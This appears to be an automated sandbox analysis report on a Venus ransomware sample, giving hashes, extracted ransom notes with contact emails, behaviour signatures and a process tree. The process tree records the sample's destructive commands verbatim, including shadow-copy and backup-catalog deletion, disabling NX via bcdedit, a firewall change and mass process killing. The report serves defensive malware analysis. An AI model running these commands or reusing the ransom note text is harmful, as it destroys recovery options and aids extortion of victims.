Analysis

  • max time kernel
    101s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-12-2022 04:50

General

  • Target

    fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe

  • Size

    225KB

  • MD5

    f62590e838b1d13960abb6b363e03ed9

  • SHA1

    66f706a7d39038964471e0a009a76e0f978fb075

  • SHA256

    fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3

  • SHA512

    7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556

  • SSDEEP

    6144:IuC7JmXiQwAh6jkJwkNV50DEr9MxgTw7ozFD254W:IuCteiQwAjw1DDGcopfW

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>email:[email protected]<br></strong><br><br>7tHcfikjaWfTUUQi1kF4/IpRAHcm3O9U8KwEbX+hYTWWtdPCTp1j+amG/hwc/ff7 W5hdcXuUUdNz5ctjkpvYvJTI0hvnIVuT/qua5Ia8HTV5jdjtBhO5CwxiCoyV29k5 I+OOoxMV/qujZrYStLFjBbPKeaCIg+zKRBpF4ylSY8Gv6i+zHIgNUPaSKrNKJ7G9 iqimwPqmZBPZLUHA228iP144WebJTgBBrx97xxOAtlY8Yw4SH5O1EMA/VFr8ZxHE e7vBYUSVWKEPd8deN817uBxttArs0CZiHFMq72Re9ImTJHGkjpSAlg0cR+sx3oS/ iIoXY8VYnQyHhc1nzszlTdUAT3AsPuq/g1omgDXZ6uLpOFVdvLc10yph3mnH8wu/ e88ezM3wGRv0/LJY9ZDXEJGKaOOdTasAsXDXVcjgJErV4f5JE7fKNtvhT+GUgCPI thtzOfTYNjRL5TbB7xPlTIEKrVGQEK6qQ9B+wC5TEKya0cZUB3aH72YhSXHu9ju2 r15OjoKjlDgs4OulkN3qyfQo15KULC1HPcDx2W//pga/usSrDxafOx7wzIlzEZwf I2zlmYvJKsInCZ/Y+MagidXlqByaKMTuJHLGLFi3kDCLPlR8WCdj46MueejWjTFu LuO66VrSeuV80fg= </p></div></body></html></html></body></html>
Emails

email:[email protected]

email:[email protected]

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] email:[email protected]
Emails

email:[email protected]

email:[email protected]

Signatures

  • Venus

    Venus is a ransomware family first seen in 2022.

  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
    "C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4300
    • C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
      "C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2936
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          PID:1372
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5972
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:6024
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:5936
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3512
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5980
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:3480
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:4576
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6060
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6112
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:2644
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2848

      Network

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta

        Filesize

        1KB

        MD5

        7bf5504493e7f57fc33f3a57a63661b0

        SHA1

        624830040ff9c8856c9eefc6c34ecab242272d92

        SHA256

        4af73b1d4a6eb3d84ad3119692b156763c8616c19d671632b8afeb90878f3285

        SHA512

        abd07cd6eb2f4e7d93f7987eba0f9b18712db78a1e29c50456b871d9d91491328cd88846feaa712763ac558bc35081aa2535a046f99c61fad50462fbeb17cc0e

      • C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe

        Filesize

        225KB

        MD5

        f62590e838b1d13960abb6b363e03ed9

        SHA1

        66f706a7d39038964471e0a009a76e0f978fb075

        SHA256

        fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3

        SHA512

        7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556

      • memory/1372-140-0x0000000000000000-mapping.dmp

      • memory/2936-138-0x0000000000000000-mapping.dmp

      • memory/3376-139-0x0000000000000000-mapping.dmp

      • memory/3480-146-0x0000000000000000-mapping.dmp

      • memory/3512-148-0x0000000000000000-mapping.dmp

      • memory/4300-132-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/4576-141-0x0000000000000000-mapping.dmp

      • memory/4748-142-0x0000000000000000-mapping.dmp

      • memory/4912-143-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/4912-135-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

      • memory/4912-133-0x0000000000000000-mapping.dmp

      • memory/4932-136-0x0000000000000000-mapping.dmp

      • memory/5936-147-0x0000000000000000-mapping.dmp

      • memory/5972-144-0x0000000000000000-mapping.dmp

      • memory/5980-149-0x0000000000000000-mapping.dmp

      • memory/6024-145-0x0000000000000000-mapping.dmp